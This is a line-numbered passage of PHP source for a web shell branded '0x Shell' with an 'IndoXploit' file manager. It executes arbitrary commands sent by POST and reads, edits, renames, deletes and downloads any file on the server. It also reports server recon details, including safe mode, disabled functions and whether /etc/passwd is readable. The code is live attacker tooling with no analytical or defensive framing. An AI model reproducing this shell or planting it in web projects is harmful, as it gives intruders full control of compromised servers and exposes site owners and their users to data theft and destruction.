1387. if(!isset($file)) $file = $_GET['file'];
1388. if($filez = @fopen($file,"r")){
1389. $content = "";
1390. while(!feof($filez)){
1391. $content .= htmlentities(str_replace("''","'",fgets($filez)));
1392. }
1393. @fclose($filez);
1394. }
1395. ?>
1396. <form action="" method="post">
1397. <table class="cmdbox">
1398. <tr><td colspan="2">
1399. <textarea class="output" name="content">
1400. <?php echo $content; ?>
1401. </textarea>
1402. <tr><td colspan="2">Save as <input id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1403. &nbsp;<?php echo $msg; ?></td></tr>
1404. </table>
1405. </form>
1406. <?php
1407. }
1408. elseif(strstr($CurrentUrl, "c3J2aW5mbw")){
1409.  
1410. $s_safemode = ini_get("safe_mode");
1411. if($s_safemode = TRUE){$s_safemode = "<span class='enabled'>[ON";}else{$s_safemode = "<span class='disabled'>[OFF"; }
1412. if(extension_loaded('curl')){$curls="<span class='enabled'>[ON]</span>";}else{$curls="<span class='disabled'>[OFF]</span>";}
1413. echo "Server Port: ".$_SERVER['SERVER_PORT']."<br /><br />HTTP Connection: ".$_SERVER['HTTP_CONNECTION']."<br /><br />Operating System: ".php_uname()."<br /><br />";
1414. if(get_magic_quotes_gpc()){echo "Magic Quotes: <span class='enabled'>[ENABLED]</span><br /><br />";}else{echo "Magic Quotes: <span class='disabled'>[DISABLED]</span><br /><br />";}
1415. echo "PHP Version: ".phpversion()."<br /><br />Safe Mode: ".$s_safemode."]</span><br /><br />Curl: ".$curls."<br /><br />Accept Encoding: ".$_SERVER['HTTP_ACCEPT_ENCODING']."<br /><br />Admin: ".$_SERVER['SERVER_ADMIN']."<br /><br /><strong>Disabled Functions: </strong>";
1416. if(!empty($disabled)){
1417. foreach($disabled as $functionsdis){
1418. echo $functionsdis.", ";
1419. }
1420. }else{
1421. echo "none";
1422. }
1423. echo "<br /><br /><strong>/etc/passwd: </strong>";
1424. if(is_readable("/home/etc/passwd")){
1425. echo "<span style='color:green;'>Readable</span>";
1426. }else{
1427. echo "<span style='color:red;'>Unreadable</span>";
1428. }
1429. }elseif($_GET['do'] == 'cmd') {
1430. if($_POST['do_cmd']) {
1431. echo "<pre>".exe($_POST['cmd'])."</pre>";
1432. }
1433. }elseif(strstr($CurrentUrl, "about")){
1434.  
1435. echo "
1436. <h4>Information</h4>
1437. <p>0x Shell v".$shellVersion." Ngelu Edition - coded by 7atim.</p>";
1438.  
1439. ?>
1440. <ul>
1441. <li>Appearance C6 Shell.</li>
1442. <li>File Manager By IndoXploit.</li>
1443. <li>Thanks.</li>
1444. </ul>
1445. <br /><br />
1446. <?php
1447. }else{
1448. function GetFileSize($file){
1449. if(!is_dir($file))
1450. return round(filesize($file) / 1024, 2) . " Kb";
1451. else
1452. return "Not Availible";
1453. }
1454.  
1455. function LastModified($file){
1456. return date("F d Y g:i:s", filemtime("$file"));}
1457. function permissions($file){
1458.  
1459. $perms = fileperms($file);
1460. if (($perms & 0xC000) == 0xC000) {
1461. $info = 's';
1462. } elseif (($perms & 0xA000) == 0xA000) {
1463. $info = 'l';
1464. } elseif (($perms & 0x8000) == 0x8000) {
1465. $info = '-';
1466. } elseif (($perms & 0x6000) == 0x6000) {
1467. $info = 'b';
1468. } elseif (($perms & 0x4000) == 0x4000) {
1469. $info = 'd';
1470. } elseif (($perms & 0x2000) == 0x2000) {
1471. $info = 'c';
1472. } elseif (($perms & 0x1000) == 0x1000) {
1473. $info = 'p';
1474. } else {
1475. $info = 'u';
1476. }
1477. $info .= (($perms & 0x0100) ? 'r' : '-');
1478. $info .= (($perms & 0x0080) ? 'w' : '-');
1479. $info .= (($perms & 0x0040) ?
1480. (($perms & 0x0800) ? 's' : 'x' ) :
1481. (($perms & 0x0800) ? 'S' : '-'));
1482. $info .= (($perms & 0x0020) ? 'r' : '-');
1483. $info .= (($perms & 0x0010) ? 'w' : '-');
1484. $info .= (($perms & 0x0008) ?
1485. (($perms & 0x0400) ? 's' : 'x' ) :
1486. (($perms & 0x0400) ? 'S' : '-'));
1487. $info .= (($perms & 0x0004) ? 'r' : '-');
1488. $info .= (($perms & 0x0002) ? 'w' : '-');
1489. $info .= (($perms & 0x0001) ?
1490. (($perms & 0x0200) ? 't' : 'x' ) :
1491. (($perms & 0x0200) ? 'T' : '-'));
1492. return $info;
1493. }
1494.  
1495. ////////////
1496.  
1497. if(is_dir($dir) == true) {
1498. echo '<table class="FileBrowserTable"><tr><td class="TableHeader_Name"> FileName</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableLast">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>';
1499. $scandir = scandir($dir);
1500. foreach($scandir as $dirx) {
1501. $dtype = filetype("$dir/$dirx");
1502. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1503. if(!is_dir("$dir/$dirx")) continue;
1504. if($dirx === '..') {
1505. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1506. } elseif($dirx === '.') {
1507. $href = "<a href='?dir=$dir'>$dirx</a>";
1508. } else {
1509. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1510. }
1511. if($dirx === '.' || $dirx === '..') {
1512. $act_dir = "<a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
1513. } else {
1514. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
1515. }
1516. echo "<tr>";
1517. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAFUSURBVDiNpZK9SgNBFIXPvXNndjcRopX4U4kWVr5AChU7H8BSfItAHkB9CXsrW0GwEQtRwVKMRtAU8ZcYWaNmM2OxqyyiYZdcGIaZ4Z77MeeQcw6DFA/UDUAAYHHj8hOATj9oRSe2Z1f2KjP1fgLknMPS5lW0Vi4pZopvHXDW+IhOr99gXTzkr9qvTBMtrNd8AsLVcomZKDP61kELihGIJ9QBgO2jdsIE/Jb5OacGFAwDQEeMEOZnh1EqMChtSB8a64BW2MNh7QVihCGKcNHswmZ0lAkYHxF4QhBPCKIYRU9l605KmGCEIUYztCYMBfkEjGZ4OiHwRQF+vkQG+ptACIFREJVPQAvFf+BrjoyQ+CZfqq118DRFEhjebbbel6dGiyTqf+vSrkaRQ/0utL7mHXl9vq+eP3Unbh/H5gDKiOF67YebY0dSJcRBm0z2rFl2yWp8AVDIW32da7pLAAAAAElFTkSuQmCC'> $href</td>";
1518. echo "<td class='td_home'><center>$dtype</center></td>";
1519. echo "<td class='td_home'><center>-</center></th>";
1520. echo "<td class='td_home'><center>".w("$dir/$dirx",permissions("$dir/$dirx"))."</center></td>";
1521. echo "<td class='td_home'>$dtime</td>";
1522. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1523. }
1524. echo "</tr>";
1525. foreach($scandir as $file) {
1526. $ftype = filetype("$dir/$file");
1527. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1528. $size = filesize("$dir/$file")/1024;
1529. $size = round($size,3);
1530. if($size > 1024) {
1531. $size = round($size/1024,2). 'MB';
1532. } else {
1533. $size = $size. 'KB';
1534. }
1535. if(!is_file("$dir/$file")) continue;
1536. echo "<tr>";
1537. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1538. echo "<td class='td_home'><center>$ftype</center></td>";
1539. echo "<td class='td_home'><center>$size</center></td>";
1540. echo "<td class='td_home'><center>".w("$dir/$file",permissions("$dir/$file"))."</center></td>";
1541. echo "<td class='td_home'>$ftime</td>";
1542. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
1543. }
1544. echo "</tr></table>";
1545. } else {
1546. echo "<font color=red>can't open directory</font>";
1547. }
1548.  
1549.  
1550.  
1551. ?></table>
1552. <div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;" ></div>
1553.  
1554. <?php
1555.  
1556. }
1557. ob_flush();
1558. ?>
1559. <center>
1560. Copyright © 2017 - PEJUH MUNCRAT
1561. </body>
1562. </html>